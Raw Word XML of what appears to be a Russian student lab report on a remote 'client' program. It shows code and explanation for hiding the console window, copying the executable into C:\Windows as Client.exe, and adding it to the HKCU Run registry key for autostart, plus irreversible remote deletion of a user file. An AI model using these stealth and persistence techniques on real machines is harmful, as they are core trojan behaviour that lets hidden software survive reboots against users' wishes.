                                <w:noProof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>Рисунок 2 – Удаление файла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D3BE46" id="Надпись 5" o:spid="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:286.45pt;width:473.4pt;height:23.1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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="30373C3A" w14:textId="5FC377FB" w:rsidR="00427460" w:rsidRDefault="00427460" w:rsidP="00427460">
                      <w:pPr>
                        <w:pStyle w:val="aff"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b w:val="0"/>
                          <w:bCs w:val="0"/>
                          <w:noProof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>Рисунок 2 – Удаление файла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508E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46CBAA14" wp14:editId="252AF55D">
            <wp:extent cx="6299835" cy="354393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02F9A" w14:textId="24D88406" w:rsidR="001508E9" w:rsidRPr="00595998" w:rsidRDefault="001508E9" w:rsidP="00C045FB">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t>В результате работы данной программы файл с именем “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>importantInfo</w:t>
      </w:r>
      <w:r>
        <w:t>.txt” был успешно удален</w:t>
      </w:r>
      <w:r w:rsidR="00595998" w:rsidRPr="00595998">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00595998">
        <w:t>важно отметить, что файл был удалён безвозвратно. Корзина была пуста до удаления файла и осталась пустой после удаления.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEA23E8" w14:textId="1F50BFF7" w:rsidR="00595998" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Описание методов маскировки работы программы-клиента, добавления программы-клиента в автозагрузку и копирования программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00F426D0">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72095587" w14:textId="070EA128" w:rsidR="00F426D0" w:rsidRPr="00595998" w:rsidRDefault="00595998" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/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</w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidR="00F426D0" w:rsidRPr="00595998">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>крыти</w:t>
      </w:r>
      <w:r w:rsidR="004E1B96">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00F426D0" w:rsidRPr="00595998">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> консольного окна программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E6A3B" w14:textId="0BAA4A85" w:rsidR="00F426D0" w:rsidRPr="0050170E" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BOOL</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ShowWindow</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HWND</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hWnd</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nCmdShow</w:t>
      </w:r>
      <w:r w:rsidRPr="0050170E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F2A980" w14:textId="1EF99806" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hWnd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- путь до окна, состояние которого будем изменять. В нашем случае используем команду </w:t>
      </w:r>
      <w:r w:rsidRPr="00F243D8">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GetConsoleWindow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для получения доступа к консоли</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCDED8D" w14:textId="4BDC8863" w:rsidR="00F426D0" w:rsidRPr="00595998" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nCmdShow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - аргумент, содержащий в себе команду, которая отвечает за то, как будет показано выбранное окно. Аргументом выбираем </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SW_HIDE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061F2380" w14:textId="77777777" w:rsidR="00F426D0" w:rsidRPr="00595998" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Процедура копирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26251742" w14:textId="77777777" w:rsidR="00F243D8" w:rsidRPr="0026490E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6490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>define</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490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WIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_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PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490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L</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"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C</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:\\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Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>\\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Client</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.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exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F351D1D" w14:textId="77777777" w:rsidR="00F243D8" w:rsidRPr="0026490E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7567E020" w14:textId="75B170B4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ProcedureCopy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E217D" w14:textId="77777777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F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCHAR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* FilePath;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1227879D" w14:textId="77777777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14:paraId="118A454A" w14:textId="77777777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FilePath = (</w:t>
      </w:r>
      <w:r w:rsidRPr="00F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCHAR</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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*)calloc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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MAX_PATH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243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCHAR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0090E4A7" w14:textId="77777777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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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GetModuleFileName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FilePath,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MAX_PATH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== 0) </w:t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A09A0E" w14:textId="77777777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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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CopyFile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FilePath,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WIN_PATH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TRUE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== 0) </w:t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788F22C" w14:textId="1942FE8E" w:rsidR="00F426D0" w:rsidRDefault="00F243D8" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22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F67A708" w14:textId="1C38D8A9" w:rsidR="00F243D8" w:rsidRPr="00595998" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Процедура копирования программы самой себя в системный каталог вызывается в самом начале работы главного тела программы. Это обусловлено последующим вызовом процедуры установки автозапуска программы из системного каталога</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0949DDC2" w14:textId="5F16E05D" w:rsidR="00F426D0" w:rsidRPr="00595998" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Процедура добавления в автозапуск</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C53FD" w14:textId="3D706754" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00187B79">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Процедура, добавляющая программу в автозагрузку, вызывается после копирования exe-файла в системный каталог. В автозагрузку выставляется программа, скопированная в системный каталог. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3357CF86" w14:textId="77777777" w:rsidR="00F243D8" w:rsidRPr="0026490E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6490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>define</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490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WIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_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PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490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L</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"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C</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:\\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Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>\\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Client</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.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exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC10844" w14:textId="77777777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REG_PATH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L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A670892" w14:textId="77777777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REG_NAME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243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L"Client"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D96EEA8" w14:textId="77777777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4A110A5" w14:textId="333D92AA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ProcedureAutorun(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42086AC0" w14:textId="77777777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F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY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Key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F4154D" w14:textId="7BAD0C8E" w:rsid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F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LONG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14:paraId="38C7ABCE" w14:textId="77777777" w:rsidR="00595998" w:rsidRPr="00F243D8" w:rsidRDefault="0059599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DCCF87" w14:textId="77777777" w:rsid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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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RegOpenKey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HKEY_CURRENT_USER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</w:p>
    <w:p w14:paraId="49E204BD" w14:textId="188E9AFE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REG_PATH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, &amp;Key)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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) !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=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ERROR_SUCCESS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DC915C" w14:textId="77777777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</w:p>
    <w:p w14:paraId="6EC17A4B" w14:textId="79468E2C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((Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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RegSetValueEx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Key,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REG_NAME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0,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REG_SZ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</w:p>
    <w:p w14:paraId="1C5C6969" w14:textId="77777777" w:rsid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(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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proofErr w:type="gramEnd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unsigned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*)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WIN_PATH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</w:p>
    <w:p w14:paraId="0F7D8377" w14:textId="22C93754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WIN_PATH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+ 1)) != </w:t>
      </w:r>
      <w:r w:rsidRPr="00F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS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F243D8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291537" w14:textId="77777777" w:rsidR="00F243D8" w:rsidRP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</w:p>
    <w:p w14:paraId="340084C4" w14:textId="77777777" w:rsidR="00F243D8" w:rsidRPr="0026490E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RegCloseKey</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E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F243D8">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r w:rsidRPr="0026490E"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E35D4FA" w14:textId="12F2252E" w:rsidR="00F243D8" w:rsidRDefault="00F243D8" w:rsidP="00187B79">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="85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E88FE3F" w14:textId="77777777" w:rsidR="00F243D8" w:rsidRPr="0026490E" w:rsidRDefault="00F243D8" w:rsidP="00C045FB">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="1276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255F79F6" w14:textId="431A59FC" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00C045FB">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Для добавления программы в автозапуск создадим процедуру типа void, которая при помощи функций работы с реестром создаст в соответствующем корне необходимый раздел со значением, который будет соответствовать установке автозапуска выбранной программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7485CDDE" w14:textId="2282860C" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00C045FB">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HKEY Key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - переменная, которая будет содержать ключ реестра</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1161472F" w14:textId="7E36DE5E" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00C045FB">
      <w:pPr>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LONG Result</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - переменная будет хранить в себе результат выполненных операци</w:t>
      </w:r>
      <w:r w:rsidR="00595998">
        <w:t>й</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512242D0" w14:textId="1BE1DE50" w:rsidR="00F426D0" w:rsidRDefault="00F426D0" w:rsidP="00C045FB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3119"/>
        </w:tabs>
        <w:ind w:firstLine="850"/>
      </w:pPr>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Result = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RegOpenKey(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER, REG_PATH, &amp;Key)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - переменной присваивается результат, подразумевающий успешность выполненной операции по открытию указанного раздела </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REG_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в соответствующем каталоге </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Путь записывается в </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00595998">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REG_PATH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
